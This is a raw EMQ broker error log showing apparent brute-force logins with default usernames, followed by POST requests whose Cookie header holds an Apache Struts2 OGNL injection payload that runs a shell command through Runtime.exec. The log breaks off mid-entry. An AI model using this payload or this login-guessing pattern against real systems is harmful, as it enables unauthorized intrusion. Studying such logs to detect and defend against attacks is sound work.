2019-02-15 18:37:02.296 [error] <0.7312.0>@emqttd_http:authorized:142 HTTP Auth failure: username=system, reason="User not found"
2019-02-15 18:37:02.783 [error] <0.7313.0>@emqttd_http:authorized:142 HTTP Auth failure: username=system, reason="User not found"
2019-02-15 18:37:02.873 [error] <0.7314.0>@emqttd_http:authorized:142 HTTP Auth failure: username=system, reason="User not found"
2019-02-15 18:37:02.999 [error] <0.7315.0>@emqttd_http:authorized:142 HTTP Auth failure: username=temp, reason="User not found"
2019-02-15 18:37:03.695 [error] <0.7319.0>@emqttd_http:authorized:142 HTTP Auth failure: username=sys, reason="User not found"
2019-02-15 18:37:03.886 [error] <0.7320.0>@emqttd_http:authorized:142 HTTP Auth failure: username=temp, reason="User not found"
2019-02-15 18:37:04.026 [error] <0.7321.0>@emqttd_http:authorized:142 HTTP Auth failure: username=temp, reason="User not found"
2019-02-15 18:37:04.532 [error] <0.7322.0>@emqttd_http:authorized:142 HTTP Auth failure: username=temp, reason="User not found"
2019-02-15 18:37:05.055 [error] <0.7325.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tempuser, reason="User not found"
2019-02-15 18:37:05.738 [error] <0.7326.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tempuser, reason="User not found"
2019-02-15 18:37:06.139 [error] <0.7327.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tempuser, reason="User not found"
2019-02-15 18:37:06.186 [error] <0.7328.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tempuser, reason="User not found"
2019-02-15 18:37:06.640 [error] <0.7331.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tempuser, reason="User not found"
2019-02-15 18:37:06.853 [error] <0.7332.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test, reason="User not found"
2019-02-15 18:37:08.774 [error] <0.7336.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test, reason="User not found"
2019-02-15 18:37:09.220 [error] <0.7337.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test, reason="User not found"
2019-02-15 18:37:09.494 [error] <0.7339.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test, reason="User not found"
2019-02-15 18:37:09.642 [error] <0.7340.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test123, reason="User not found"
2019-02-15 18:37:09.696 [error] <0.7341.0>@emqttd_http:authorized:142 HTTP Auth failure: username=temp, reason="User not found"
2019-02-15 18:37:09.734 [error] <0.7342.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test, reason="User not found"
2019-02-15 18:37:09.910 [error] <0.7343.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test123, reason="User not found"
2019-02-15 18:37:09.926 [error] <0.7344.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test123, reason="User not found"
2019-02-15 18:37:10.308 [error] <0.7345.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tester, reason="User not found"
2019-02-15 18:37:10.355 [error] <0.7346.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test123, reason="User not found"
2019-02-15 18:37:10.396 [error] <0.7347.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tester, reason="User not found"
2019-02-15 18:37:10.484 [error] <0.7348.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tester, reason="User not found"
2019-02-15 18:37:10.896 [error] <0.7352.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tester, reason="User not found"
2019-02-15 18:37:11.049 [error] <0.7353.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tester, reason="User not found"
2019-02-15 18:37:11.079 [error] <0.7354.0>@emqttd_http:authorized:142 HTTP Auth failure: username=test123, reason="User not found"
2019-02-15 18:37:11.090 [error] <0.7355.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user, reason="User not found"
2019-02-15 18:37:11.780 [error] <0.7356.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user, reason="User not found"
2019-02-15 18:37:11.932 [error] <0.7357.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user, reason="User not found"
2019-02-15 18:37:12.196 [error] <0.7360.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user123, reason="User not found"
2019-02-15 18:37:12.365 [error] <0.7362.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user, reason="User not found"
2019-02-15 18:37:12.812 [error] <0.7363.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user123, reason="User not found"
2019-02-15 18:37:12.951 [error] <0.7364.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user123, reason="User not found"
2019-02-15 18:37:13.138 [error] <0.7365.0>@emqttd_http:authorized:142 HTTP Auth failure: username=username, reason="User not found"
2019-02-15 18:37:13.289 [error] <0.7366.0>@emqttd_http:authorized:142 HTTP Auth failure: username=username, reason="User not found"
2019-02-15 18:37:13.339 [error] <0.7367.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user123, reason="User not found"
2019-02-15 18:37:13.407 [error] <0.7368.0>@emqttd_http:authorized:142 HTTP Auth failure: username=username, reason="User not found"
2019-02-15 18:37:13.624 [error] <0.7369.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user123, reason="User not found"
2019-02-15 18:37:13.692 [error] <0.7370.0>@emqttd_http:authorized:142 HTTP Auth failure: username=username, reason="User not found"
2019-02-15 18:37:13.784 [error] <0.7371.0>@emqttd_http:authorized:142 HTTP Auth failure: username=username, reason="User not found"
2019-02-15 18:37:14.079 [error] <0.7372.0>@emqttd_http:authorized:142 HTTP Auth failure: username=usr123, reason="User not found"
2019-02-15 18:37:14.205 [error] <0.7373.0>@emqttd_http:authorized:142 HTTP Auth failure: username=usr123, reason="User not found"
2019-02-15 18:37:14.271 [error] <0.7374.0>@emqttd_http:authorized:142 HTTP Auth failure: username=usr123, reason="User not found"
2019-02-15 18:37:14.421 [error] <0.7375.0>@emqttd_http:authorized:142 HTTP Auth failure: username=user, reason="User not found"
2019-02-15 18:37:14.847 [error] <0.7379.0>@emqttd_http:authorized:142 HTTP Auth failure: username=usr123, reason="User not found"
2019-02-15 18:37:15.304 [error] <0.7380.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webadmin, reason="User not found"
2019-02-15 18:37:15.649 [error] <0.7381.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webadmin, reason="User not found"
2019-02-15 18:37:15.665 [error] <0.7382.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webadmin, reason="User not found"
2019-02-15 18:37:15.720 [error] <0.7383.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webadmin, reason="User not found"
2019-02-15 18:37:15.734 [error] <0.7384.0>@emqttd_http:authorized:142 HTTP Auth failure: username=usr123, reason="User not found"
2019-02-15 18:37:16.142 [error] <0.7385.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webadmin, reason="User not found"
2019-02-15 18:37:16.663 [error] <0.7389.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webtest, reason="User not found"
2019-02-15 18:37:17.304 [error] <0.7390.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webtest, reason="User not found"
2019-02-15 18:37:18.040 [error] <0.7392.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webuser, reason="User not found"
2019-02-15 18:37:18.077 [error] <0.7393.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webtest, reason="User not found"
2019-02-15 18:37:18.401 [error] <0.7394.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webtest, reason="User not found"
2019-02-15 18:37:18.678 [error] <0.7396.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webuser, reason="User not found"
2019-02-15 18:37:19.443 [error] <0.7399.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webtest, reason="User not found"
2019-02-15 18:37:19.892 [error] <0.7401.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webuser, reason="User not found"
2019-02-15 18:37:20.146 [error] <0.7402.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webuser, reason="User not found"
2019-02-15 18:37:20.639 [error] <0.7404.0>@emqttd_http:authorized:142 HTTP Auth failure: username=wwwuser, reason="User not found"
2019-02-15 18:37:20.739 [error] <0.7405.0>@emqttd_http:authorized:142 HTTP Auth failure: username=wwwuser, reason="User not found"
2019-02-15 18:37:21.200 [error] <0.7406.0>@emqttd_http:authorized:142 HTTP Auth failure: username=wwwuser, reason="User not found"
2019-02-15 18:37:22.248 [error] <0.7407.0>@emqttd_http:authorized:142 HTTP Auth failure: username=wwwuser, reason="User not found"
2019-02-15 18:37:22.370 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7408.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5827>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:22.371 [error] emulator Error in process <0.7408.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5827>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{11,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},nil}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:37:22.458 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7409.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5828>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:22.459 [error] emulator Error in process <0.7409.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5828>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{11,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},nil}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:37:22.542 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7410.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5829>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:22.544 [error] emulator Error in process <0.7410.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5829>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{11,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},nil}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:37:22.604 [error] <0.7411.0>@emqttd_http:authorized:142 HTTP Auth failure: username=webuser, reason="User not found"
2019-02-15 18:37:22.968 [error] <0.7412.0>@emqttd_http:authorized:142 HTTP Auth failure: username=role1, reason="User not found"
2019-02-15 18:37:23.333 [error] <0.7413.0>@emqttd_http:authorized:142 HTTP Auth failure: username=role1, reason="User not found"
2019-02-15 18:37:23.378 [error] <0.7414.0>@emqttd_http:authorized:142 HTTP Auth failure: username=role1, reason="User not found"
2019-02-15 18:37:23.468 [error] <0.7415.0>@emqttd_http:authorized:142 HTTP Auth failure: username=role1, reason="User not found"
2019-02-15 18:37:23.554 [error] <0.7416.0>@emqttd_http:authorized:142 HTTP Auth failure: username=both, reason="User not found"
2019-02-15 18:37:23.911 [error] <0.7418.0>@emqttd_http:authorized:142 HTTP Auth failure: username=both, reason="User not found"
2019-02-15 18:37:25.009 [error] <0.7419.0>@emqttd_http:authorized:142 HTTP Auth failure: username=wwwuser, reason="User not found"
2019-02-15 18:37:25.224 [error] <0.7420.0>@emqttd_http:authorized:142 HTTP Auth failure: username=both, reason="User not found"
2019-02-15 18:37:25.967 [error] <0.7421.0>@emqttd_http:authorized:142 HTTP Auth failure: username=role1, reason="User not found"
2019-02-15 18:37:26.272 [error] <0.7422.0>@emqttd_http:authorized:142 HTTP Auth failure: username=both, reason="User not found"
2019-02-15 18:37:26.333 [error] <0.7423.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tomcat, reason="User not found"
2019-02-15 18:37:26.620 [error] <0.7424.0>@emqttd_http:authorized:142 HTTP Auth failure: username=both, reason="User not found"
2019-02-15 18:37:26.633 [error] <0.7425.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tomcat, reason="User not found"
2019-02-15 18:37:26.691 [error] <0.7426.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tomcat, reason="User not found"
2019-02-15 18:37:27.009 [error] <0.7427.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tomcat, reason="User not found"
2019-02-15 18:37:27.098 [error] <0.7428.0>@emqttd_http:authorized:142 HTTP Auth failure: username=manager, reason="User not found"
2019-02-15 18:37:27.939 [error] <0.7429.0>@emqttd_http:authorized:142 HTTP Auth failure: username=manager, reason="User not found"
2019-02-15 18:37:28.325 [error] <0.7430.0>@emqttd_http:authorized:142 HTTP Auth failure: username=tomcat, reason="User not found"
2019-02-15 18:37:28.451 [error] <0.7431.0>@emqttd_http:authorized:142 HTTP Auth failure: username=manager, reason="User not found"
2019-02-15 18:37:28.563 [error] <0.7432.0>@emqttd_http:authorized:142 HTTP Auth failure: username=manager, reason="User not found"
2019-02-15 18:37:29.487 [error] <0.7433.0>@emqttd_http:authorized:142 HTTP Auth failure: username=manager, reason="User not found"
2019-02-15 18:37:53.802 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7479.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5887>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:53.803 [error] emulator Error in process <0.7479.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5887>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:37:54.164 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7482.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5889>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:54.166 [error] emulator Error in process <0.7482.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5889>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:37:55.481 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7483.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5890>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:37:55.482 [error] emulator Error in process <0.7483.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5890>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/x-www-form-urlencoded"},{"content-length",{'Content-Length',"0"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:07.067 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7502.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5906>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:07.068 [error] emulator Error in process <0.7502.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5906>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/xml"},{"content-length",{'Content-Length',"1702"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:08.122 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7505.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5908>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:08.124 [error] emulator Error in process <0.7505.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5908>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/xml"},{"content-length",{'Content-Length',"1702"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:08.206 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7506.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5909>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:08.208 [error] emulator Error in process <0.7506.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5909>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/",{1,1},{12,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/xml"},{"content-length",{'Content-Length',"1702"},nil,nil},{"cookie",{'Cookie',"(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20cb55e9d2a8902e4eadc053443c8b1f2f%27%29.getInputStream%28%29%29)=2"},nil,nil}}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:38:11.569 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7509.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5911>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:38:11.571 [error] emulator Error in process <0.7509.0> on node 'emq@127.0.0.1' with exit value:
